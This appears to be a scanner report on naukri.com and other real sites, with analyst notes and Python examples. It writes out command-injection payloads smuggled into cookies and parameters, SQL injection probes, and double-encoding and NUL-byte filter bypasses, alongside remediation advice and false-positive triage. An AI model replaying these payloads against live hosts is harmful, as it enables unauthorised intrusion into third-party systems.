35.218. http://www.townnews365.com/users/manage/global/resources/images/icon-03.gif

35.219. http://www.townnews365.com/users/manage/global/resources/styles/print.css

35.220. http://www.townnews365.com/users/manage/service/purchase_select/

35.221. http://www.townnews365.com/wheels_forms

35.222. http://www.townnews365.com/wrapper-company/

35.223. http://www.vccedge.com/files/vccircle_favicon.ico

35.224. http://www.vccircle.com/files/vccircle_favicon.ico

35.225. http://www.vccircle.com/themes/vccircle/images/logo.gif

1. OS command injection
There are 3 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform commands other than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:



1.1. http://jobsearch.naukri.com/callcenter-ites-jobs/ [_nkjs cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://jobsearch.naukri.com
Path:   /callcenter-ites-jobs/

Issue detail

The _nkjs cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the _nkjs cookie. The application took 20185 milliseconds to respond to the request, compared with 661 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /callcenter-ites-jobs/ HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163`ping%20-c%2020%20127.0.0.1`; test=naukri.com; __utma=159336229.794915474.1305381519.1305381519.1305381519.1; __utmc=159336229; __utmz=159336229.1305381519.1.1.utmccn=(referral)|utmcsr=naukri.com|utmcct=/tieups/tieups.php|utmcmd=referral; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmb=159336229

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 13:59:52 GMT
Content-Length: 84960
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

1.2. http://jobsearch.naukri.com/information-technology-jobs/ [_nkjs cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://jobsearch.naukri.com
Path:   /information-technology-jobs/

Issue detail

The _nkjs cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the _nkjs cookie. The application took 19699 milliseconds to respond to the request, compared with 632 milliseconds for the original request, indicating that the injected command caused a time delay.

The extra latency is again about 19 seconds, the run time of a 20-probe ping, and the cookie, payload and server banner are identical to 1.1. The two paths almost certainly share the code that consumes _nkjs, so the findings should be tracked as one issue and both paths re-tested after the fix.

Request

GET /information-technology-jobs/ HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163`ping%20-c%2020%20127.0.0.1`; test=naukri.com; __utma=159336229.794915474.1305381519.1305381519.1305381519.1; __utmc=159336229; __utmz=159336229.1305381519.1.1.utmccn=(referral)|utmcsr=naukri.com|utmcct=/tieups/tieups.php|utmcmd=referral; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmb=159336229

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 13:59:57 GMT
Content-Length: 79225
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

1.3. http://w28.naukri.com/advertiser/bms_logimpressions.php [banlist parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://w28.naukri.com
Path:   /advertiser/bms_logimpressions.php

Issue detail

The banlist parameter appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the banlist parameter. The application took 76094 milliseconds to respond to the request, compared with 11 milliseconds for the original request, indicating that the injected command caused a time delay.

The delay is far larger than the roughly 19 seconds a single `ping -c 20` takes. The banlist value carries four comma-separated banner IDs, and about four times 19 seconds would be consistent with the injected command being executed once per list entry, but that is an inference from timing alone; confirm it by re-testing with a single ID and a shorter count such as `-c 5`. The endpoint returns the same 43-byte GIF for any input, so no output-based confirmation is available, and the request needs no session cookie, so the injection is reachable unauthenticated.

Request

GET /advertiser/bms_logimpressions.php?banlist=371305,378465,29836,378317`ping%20-c%2020%20127.0.0.1` HTTP/1.1
Host: w28.naukri.com
Proxy-Connection: keep-alive
Referer: http://www.naukri.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=naukri.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:58:07 GMT
Server: NWS/1.0. (Unix) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

2. SQL injection
There are 83 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
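As an added example (not code from this report or from the audited applications), the following Python runs the two probes the scanner relies on in section 2, the boolean difference test (`' or 1=1-- ` against `' or 1=2-- `, findings 2.2 and 2.6) and the quote/escaped-quote error test (findings 2.1, 2.3, 2.4, 2.7 to 2.10), against a string-built query and against the parameterised form the remediation describes. The in-memory SQLite banner table, its rows and the column names are constructed for illustration and are not the real schema.

```python
"""Added example: string-built SQL versus parameterised SQL under the report's two probes."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for a banner lookup (illustrative, not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE banners (id INTEGER PRIMARY KEY, target_url TEXT NOT NULL)")
    conn.executemany("INSERT INTO banners VALUES (?, ?)", [
        (378465, "http://example.invalid/bajaj"),
        (371305, "http://example.invalid/other"),
    ])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, banner: str) -> list:
    """The anti-pattern behind findings 2.2 and 2.6: the value becomes part of the SQL text."""
    sql = f"SELECT target_url FROM banners WHERE id = '{banner}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn: sqlite3.Connection, banner: str) -> list:
    """Structure is fixed first, the value is bound afterwards and can only ever be data."""
    sql = "SELECT target_url FROM banners WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (banner,))]


def boolean_probe(lookup, conn: sqlite3.Connection, base: str = "37846511435646") -> tuple:
    """Difference test: a non-existent id with 'or 1=1' and then 'or 1=2' appended.

    Returns the two row counts; they differ only when the input reaches the SQL parser.
    """
    true_rows = lookup(conn, base + "' or 1=1-- ")
    false_rows = lookup(conn, base + "' or 1=2-- ")
    return len(true_rows), len(false_rows)


def quote_probe(lookup, conn: sqlite3.Connection, base: str = "378465") -> tuple:
    """Error test: one quote breaks the SQL, two quotes (an escaped quote) repair it.

    Returns (error_on_one_quote, error_on_two_quotes).
    """
    def raises(value: str) -> bool:
        try:
            lookup(conn, value)
            return False
        except sqlite3.Error:
            return True
    return raises(base + "'"), raises(base + "''")


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("parameterised", lookup_parameterised)):
        print(name, "boolean probe:", boolean_probe(fn, db), "quote probe:", quote_probe(fn, db))
```

For the string-built query the boolean probe returns (2, 0) and the quote probe (True, False), exactly the signatures the report describes; for the parameterised query both probes are flat, (0, 0) and (False, False), because the payload is compared as a literal value and never parsed. When reviewing a "Tentative" item, reproduce these two signatures by hand before accepting it: a difference caused by load, rate limiting or a per-request token looks the same to an automated comparison but will not track the 1=1/1=2 condition.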

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://cm.g.doubleclick.net/pixel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Neither response below is a database error. Response 1 is Google's standard 404 page from the Cookie Matcher front end, and Response 2 is a 403 "Sorry..." page from GFE/2.0, the block page Google serves to traffic it classifies as automated. The difference is explained by the front end rather than by SQL handling, so this item should be treated as a probable false positive unless a further test reproduces it.

Request 1

GET /pixel'?nid=c44786835&CriteoUserId=328be210-c808-4360-8f7b-dd0b2aa56e02&rtbId=4 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712352%26pt1%3D0%26pt2%3D1%26si%3D1&t1=sendEvent&p=2406&c=2&cb=66269283823
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 14:26:28 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 11878
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...

Request 2

GET /pixel''?nid=c44786835&CriteoUserId=328be210-c808-4360-8f7b-dd0b2aa56e02&rtbId=4 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712352%26pt1%3D0%26pt2%3D1%26si%3D1&t1=sendEvent&p=2406&c=2&cb=66269283823
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 403 Forbidden
Content-Length: 1207
Content-Type: text/html
Date: Sat, 14 May 2011 14:26:31 GMT
Server: GFE/2.0

<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"/><title>Sorry...</title><style> body { font-family: verdana, arial, sans-serif; background-color: #fff; color: #000; }</s
...[SNIP]...

2.2. http://jobsearch.naukri.com/information-technology-jobs/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://jobsearch.naukri.com
Path:   /information-technology-jobs/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 82395615'%20or%201%3d1--%20 and 82395615'%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Both responses are 200 pages of nearly equal length (79233 and 79245 bytes), and the only visible difference is the per-request xid token (130538174320539700 against 130538174548894100), which changes on every request. Compare the length of two identical benign requests first; only a difference that tracks the 1=1/1=2 condition is evidence of injection. __utmc is a Google Analytics cookie, so it is an unlikely database input unless the application logs it server-side.

Request 1

GET /information-technology-jobs/ HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163; test=naukri.com; __utma=159336229.794915474.1305381519.1305381519.1305381519.1; __utmc=15933622982395615'%20or%201%3d1--%20; __utmz=159336229.1305381519.1.1.utmccn=(referral)|utmcsr=naukri.com|utmcct=/tieups/tieups.php|utmcmd=referral; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmb=159336229

Response 1

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 14:02:26 GMT
Content-Length: 79233
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
.naukri.com/mynaukri/";
var sr_f = "mn_newsmartsearch.php";
var jd_f = "mn_newminnernew.php";
var crit_u = "&qcatid=4&qi[]=25&qs=r&qt=all&enableRoleMapping=y&qd=1&mode=7";
var xid = "&xid=130538174320539700";
var xq = "&xq=aP2KFaP1KiP0LBQBaP3KsP6PJqcatidJLsP1PJ4JLsP2PJqiJLaP1KiP0LsP2PJ25JLQsP2PJqlJLsP0PJJLQQ";
var jd_url = "?xz=3_9_2&xo=";
var fj_url = "?xz=3_10_2&";
var vsj_url = "?xz=3_7_3&js=1";
var vaj_url = "?xz=8_0_3&js=1";
var rc_url = "?xz=3_1_2&sws=&js=1&rs=&id=&bbtype=";
var ic_url = "?xz=3_2_2&sws=&js=1&rs=&id=";
var tfa_url="?xz=3_17_2&sws=&js=1&rs=&id=&bbtype="
var tr_url="?xz=3_18_2&sws=&js=1&rs=&id=&bbtype="
var fc_url = "?xz=3_5_2&rs=1&sws=&js=1";
var fc_jd_url = "?xz=3_12_2&xo=";
var frc_url = "?xz=3_3_2&sws=&rs=&id=&bbtype=&js=1";
var jtc_url = "?xz=3_4_2&sws=&rs=&id=&bbtype=&js=1";
var imgurl = "http://static.naukimg.com/jobsrch/";
var cookieDomainName = ".naukri.com";
var var_xz1 = '3';
var var_xz2 = '9';
var var_xz3 = '2';
var domain_cat="http://jobsearch.naukri.com/";

var val_exp="-1";
var val_farea="-1";
var val_ctc="-1";
var val_qx = '-1';

var id='&id=';
var paidcl='';
var mynaukurl = 'http://my.naukri.com/';
var recommends= "https://login.naukri.com/nLogin/Login.php?URL=http%3A%2F%2Fjobsearch.naukri.com%2Fmynaukri%2Fjs_recommends.php";
var mynaukLoginUrl = 'http://login.naukri.com/';
var l_u = 'http://apply.naukri.com/Apply/service/mn_ApplyServiceOne.php?id=';
var reportProblem = 'http://w5.naukri.com/fdbck/main/feedback.php';
var user='';
var username = '';

var applyLeft='50';
var mal='150';
var link='3';
var careersrv='http://w5.naukri.com/resbilling/main/rservices.php';
var HIDDENVARS="<input type=\"hidden\" name=\"xz\" value=\"3_9_2\"><input type=\"hidden\" name=\"xt\" value=\"bp\"><input type=\"hidden\" name=\"xid\" value=\"130538174320539700\"><input type=\"hidden\" name=\"arrxz[]\" value=\"3\"><input type=\"hidden\" name=\"arrxz[]\" value=\"9\"><input type=\"hidden\" name=\"arrxz[]\" value=\"2\"><input type=\"hidden\" name=\"xq\" value=\"aP2KFaP1KiP0LBQBaP3KsP6PJqcatidJLsP1PJ4JLsP2PJqiJLaP1KiP0LsP2PJ25JLQsP2PJqlJLsP0PJJLQQ\"><input type=\"hidden\" name=\"qcatid\" value=\"4\"><input typ
...[SNIP]...

Request 2

GET /information-technology-jobs/ HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163; test=naukri.com; __utma=159336229.794915474.1305381519.1305381519.1305381519.1; __utmc=15933622982395615'%20or%201%3d2--%20; __utmz=159336229.1305381519.1.1.utmccn=(referral)|utmcsr=naukri.com|utmcct=/tieups/tieups.php|utmcmd=referral; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmb=159336229

Response 2

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 14:02:27 GMT
Content-Length: 79245
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
.naukri.com/mynaukri/";
var sr_f = "mn_newsmartsearch.php";
var jd_f = "mn_newminnernew.php";
var crit_u = "&qcatid=4&qi[]=25&qs=r&qt=all&enableRoleMapping=y&qd=1&mode=7";
var xid = "&xid=130538174548894100";
var xq = "&xq=aP2KFaP1KiP0LBQBaP3KsP6PJqcatidJLsP1PJ4JLsP2PJqiJLaP1KiP0LsP2PJ25JLQsP2PJqlJLsP0PJJLQQ";
var jd_url = "?xz=3_9_2&xo=";
var fj_url = "?xz=3_10_2&";
var vsj_url = "?xz=3_7_3&js=1";
var vaj_url = "?xz=8_0_3&js=1";
var rc_url = "?xz=3_1_2&sws=&js=1&rs=&id=&bbtype=";
var ic_url = "?xz=3_2_2&sws=&js=1&rs=&id=";
var tfa_url="?xz=3_17_2&sws=&js=1&rs=&id=&bbtype="
var tr_url="?xz=3_18_2&sws=&js=1&rs=&id=&bbtype="
var fc_url = "?xz=3_5_2&rs=1&sws=&js=1";
var fc_jd_url = "?xz=3_12_2&xo=";
var frc_url = "?xz=3_3_2&sws=&rs=&id=&bbtype=&js=1";
var jtc_url = "?xz=3_4_2&sws=&rs=&id=&bbtype=&js=1";
var imgurl = "http://static.naukimg.com/jobsrch/";
var cookieDomainName = ".naukri.com";
var var_xz1 = '3';
var var_xz2 = '9';
var var_xz3 = '2';
var domain_cat="http://jobsearch.naukri.com/";

var val_exp="-1";
var val_farea="-1";
var val_ctc="-1";
var val_qx = '-1';

var id='&id=';
var paidcl='';
var mynaukurl = 'http://my.naukri.com/';
var recommends= "https://login.naukri.com/nLogin/Login.php?URL=http%3A%2F%2Fjobsearch.naukri.com%2Fmynaukri%2Fjs_recommends.php";
var mynaukLoginUrl = 'http://login.naukri.com/';
var l_u = 'http://apply.naukri.com/Apply/service/mn_ApplyServiceOne.php?id=';
var reportProblem = 'http://w5.naukri.com/fdbck/main/feedback.php';
var user='';
var username = '';

var applyLeft='50';
var mal='150';
var link='3';
var careersrv='http://w5.naukri.com/resbilling/main/rservices.php';
var HIDDENVARS="<input type=\"hidden\" name=\"xz\" value=\"3_9_2\"><input type=\"hidden\" name=\"xt\" value=\"bp\"><input type=\"hidden\" name=\"xid\" value=\"130538174548894100\"><input type=\"hidden\" name=\"arrxz[]\" value=\"3\"><input type=\"hidden\" name=\"arrxz[]\" value=\"9\"><input type=\"hidden\" name=\"arrxz[]\" value=\"2\"><input type=\"hidden\" name=\"xq\" value=\"aP2KFaP1KiP0LBQBaP3KsP6PJqcatidJLsP1PJ4JLsP2PJqiJLaP1KiP0LsP2PJ25JLQsP2PJqlJLsP0PJJLQQ\"><input type=\"hidden\" name=\"qcatid\" value=\"4\"><input typ
...[SNIP]...

2.3. http://my.naukri.com/EmploymentDetails/view [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://my.naukri.com
Path:   /EmploymentDetails/view

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Response 1 (500, empty body) carries X-Powered-By: PHP/5.2.5 while Response 2 (302 to the login page) carries PHP/5.2.3, so the two requests were answered by different back-end servers behind nginx and the difference may be server-specific rather than input-driven. Repeat each request several times and check whether the 500 follows the single quote or the server before accepting this item.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /EmploymentDetails/view%2527 HTTP/1.1
Host: my.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: naukri.comnginx/0.7.62
Content-Type: text/html
X-Powered-By: PHP/5.2.5
Content-Length: 0
Vary: Accept-Encoding
Date: Sat, 14 May 2011 14:13:14 GMT
Connection: close

Request 2

GET /EmploymentDetails/view%2527%2527 HTTP/1.1
Host: my.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: naukri.comnginx/0.7.62
Content-Type: text/html
X-Powered-By: PHP/5.2.3
Location: https://login.naukri.com/nLogin/Login.php?msg=3&URL=http%3A%2F%2Fmy.naukri.com%2FEmploymentDetails%2Fview%252527%252527
Vary: Accept-Encoding
Content-Length: 0
Date: Sat, 14 May 2011 14:13:14 GMT
Connection: close


2.4. http://my.naukri.com/NewProfile/listProfiles [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://my.naukri.com
Path:   /NewProfile/listProfiles

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

As in 2.3, the 500 response is served by PHP/5.2.5 and the 302 by PHP/5.2.3, two different back ends behind the same nginx front end, so the difference should be confirmed to follow the quote rather than the server. A User-Agent value is a plausible database input if the application logs visitor agents, which makes the check worth doing.

Request 1

GET /NewProfile/listProfiles HTTP/1.1
Host: my.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: naukri.comnginx/0.7.62
Content-Type: text/html
X-Powered-By: PHP/5.2.5
Content-Length: 0
Vary: Accept-Encoding
Date: Sat, 14 May 2011 14:13:15 GMT
Connection: close

Request 2

GET /NewProfile/listProfiles HTTP/1.1
Host: my.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: naukri.comnginx/0.7.62
Content-Type: text/html
X-Powered-By: PHP/5.2.3
Location: https://login.naukri.com/nLogin/Login.php?msg=3&URL=http%3A%2F%2Fmy.naukri.com%2FNewProfile%2FlistProfiles
Vary: Accept-Encoding
Content-Length: 0
Date: Sat, 14 May 2011 14:13:15 GMT
Connection: close


2.5. http://search.twitter.com/search.json [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://search.twitter.com
Path:   /search.json

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Response 1 is Twitter's rate-limit error ("You have been rate limited. Enhance your calm.") and Response 2 an ordinary empty result set. Rate limiting on a heavily scanned endpoint fully explains the differing responses, so there is no evidence here that the Referer header reaches a database; re-test at a low request rate before reporting this item.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
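As an added example (not code from this report, the audited sites or any WAF product), the following Python shows the two decoding-order mistakes behind the bypasses reported in 2.3 and 2.7 (double URL-encoding, %2527 for ') and in 2.5 and 2.10 (a NUL byte hiding the rest of the value from a native-code filter), beside a filter that canonicalises before it validates, as the remediation text recommends. The blocked token list, the filter functions and the sample values are assumptions for illustration.

```python
"""Added example: filter bypasses caused by decoding order (double URL-encoding, NUL truncation)."""
from urllib.parse import unquote

BLOCKED = ("'", "--", ";")          # the metacharacters an input filter tries to catch


def web_server_decode(raw: str) -> str:
    """The single URL-decode every web server performs on the request line."""
    return unquote(raw)


def app_double_decode(raw: str) -> str:
    """The mistake in 2.3 and 2.7: the application decodes the already-decoded value again,
    so %2527 becomes %27 at the server and ' inside the application."""
    return unquote(web_server_decode(raw))


def filter_before_second_decode(raw: str) -> bool:
    """Validation that runs on the once-decoded value misses %2527: it still sees %27."""
    return any(token in web_server_decode(raw) for token in BLOCKED)


def native_waf_filter(raw: str) -> bool:
    """A WAF written in C that stores the decoded value in a NUL-terminated buffer inspects
    only the bytes before the first NUL (2.5 and 2.10); the application sees everything."""
    decoded = web_server_decode(raw)
    visible = decoded.split("\x00", 1)[0]
    return any(token in visible for token in BLOCKED)


def canonicalise(raw: str) -> str:
    """Decode until the value stops changing so the filter sees what the application will see.
    The loop is bounded: pathological nesting is rejected rather than decoded forever."""
    value = raw
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of URL encoding")


def hardened_filter(raw: str) -> bool:
    """Canonicalise first, reject NUL outright, then validate the fully decoded value."""
    value = canonicalise(raw)
    if "\x00" in value:
        return True
    return any(token in value for token in BLOCKED)


if __name__ == "__main__":
    for sample in ("view%27", "view%2527", "q=%00'"):     # constructed request fragments
        print(sample, "| app sees:", repr(app_double_decode(sample)),
              "| weak filter:", filter_before_second_decode(sample),
              "| native WAF:", native_waf_filter(sample),
              "| hardened:", hardened_filter(sample))
```

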